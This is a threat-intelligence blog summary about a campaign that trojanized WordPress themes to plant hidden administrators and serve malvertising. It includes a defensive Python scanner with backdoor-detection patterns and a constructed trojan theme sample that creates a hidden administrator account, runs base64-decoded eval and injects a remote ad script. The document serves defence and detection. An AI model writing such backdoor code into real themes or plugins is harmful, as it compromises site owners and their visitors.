How PHP’s Labyrinth Weaponized WordPress Themes for Profit


New findings from Prevailion’s Tailored Intelligence team indicate the rapid expansion of a series of supply chain attacks that turn installations of the popular WordPress content management system into hosts for a malicious advertising network. More than 20,000 web servers have been identified as compromised in this campaign.

WordPress has grown to account for 60% of the content management system market and 34% of all websites on the internet. This widespread user base, and the ease with which a site can be customized without any coding knowledge, has created fertile ground for exploitation by the threat actors we have dubbed PHP’s Labyrinth.

As previously reported, this campaign has been weaponizing WordPress’ customization tools by enticing victims with trojanized copies of free themes and plugins. Once these are installed, the threat actors can not only compromise admin accounts but also inject malvertising into the site and use that vector to deliver exploit kits; either path allows them to compromise visitors of the affected websites.

Prevailion has been working closely with a US federal law enforcement agency to provide new evidence on the threat actor behind this sophisticated botnet, along with the discovery of previously unreported malicious activities, including: 

  • 30 active malicious platforms serving these malicious themes and plugins 
  • Newly discovered second-stage malware functionality, including an anti-adblocker script and additional C2 infrastructure
  • Distribution of the Fallout exploit kit and malvertising adware through the Propeller Ads network (which claims to have over 100 million desktop and mobile users per day)
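The summary above describes the infection chain (a trojanized theme or plugin that plants a hidden administrator and injects third-party ad scripts) but not how a site owner would check for it. The following is an added example, written for this page and not code from Prevailion or its report: a heuristic scanner that walks a WordPress install, inspects every PHP file under the themes and plugins directories, and flags generic backdoor patterns. The indicator regexes, the sample theme files, and the directory layout are all constructed by the example's author and are not indicators of compromise from the PHP's Labyrinth report.

```python
"""Heuristic scan of WordPress theme/plugin PHP for trojan indicators.

Added example, not Prevailion's code. The patterns below are generic
obfuscation / backdoor heuristics assumed for illustration; they are NOT
indicators of compromise from the PHP's Labyrinth report.
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Generic indicator patterns (assumed, not report IoCs).
INDICATORS = {
    # eval()/assert()/create_function() wrapped around a decoder call
    "obfuscated_eval": re.compile(
        r"\b(?:eval|assert|create_function)\s*\(\s*"
        r"(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(",
        re.I,
    ),
    # include/require of a remote URL (second-stage loader)
    "remote_include": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://", re.I
    ),
    # third-party <script src=...> emitted by theme code (adware / anti-adblock)
    "remote_script_tag": re.compile(
        r"<script[^>]+src\s*=\s*['\"]https?://", re.I
    ),
    # a long base64 literal is a common carrier for a packed payload
    "long_base64_blob": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
}
# A theme that creates a user AND assigns the administrator role is suspicious.
CREATES_USER = re.compile(r"\bwp_(?:create|insert)_user\s*\(")
ADMIN_ROLE = re.compile(r"['\"]administrator['\"]")


def scan_php_source(src: str) -> list[str]:
    """Return the list of indicator names that match a PHP source string."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    if CREATES_USER.search(src) and ADMIN_ROLE.search(src):
        hits.append("hidden_admin_user")
    return hits


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Scan every .php file under root; map relative path -> indicator hits."""
    findings: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_php_source(path.read_text(errors="replace"))
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


# Constructed sample files (not real theme code).
CLEAN = """<?php
// constructed sample: a benign theme bootstrap
add_action('wp_enqueue_scripts', function () {
    wp_enqueue_style('theme-style', get_stylesheet_uri());
});
"""

TROJAN = """<?php
// constructed sample: a trojanized functions.php
add_action('init', function () {
    if (!username_exists('wpsupport')) {
        $uid = wp_create_user('wpsupport', 'P@ss', 'x@example.invalid');
        $u = new WP_User($uid); $u->set_role('administrator');
    }
});
eval(base64_decode('ZWNobyAiaGVsbG8iOw=='));
add_action('wp_footer', function () {
    echo '<script src="http://ads.example.invalid/a.js"></script>';
});
"""


def build_sample_site() -> Path:
    """Write the constructed samples into a temp wp-content tree and return it."""
    root = Path(tempfile.mkdtemp(prefix="wp-"))
    clean = root / "wp-content/themes/clean-theme"
    bad = root / "wp-content/themes/free-premium-theme"
    clean.mkdir(parents=True)
    bad.mkdir(parents=True)
    (clean / "functions.php").write_text(CLEAN)
    (bad / "functions.php").write_text(TROJAN)
    return root


if __name__ == "__main__":
    for rel, hits in scan_tree(build_sample_site()).items():
        print(f"{rel}: {', '.join(hits)}")
```

Run it against a real install by calling `scan_tree(Path("/var/www/html"))`; every hit is a lead to review by hand, not a verdict, since legitimate plugins occasionally use `base64_decode` or enqueue third-party scripts. Pair the file scan with a check of `wp_users` for administrator accounts nobody recognizes, since the hidden-admin step described above survives removal of the theme itself.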

To learn more, read the full report on the Tailored Intelligence blog.


Copyright 2021 Prevailion, Inc. All rights reserved.    
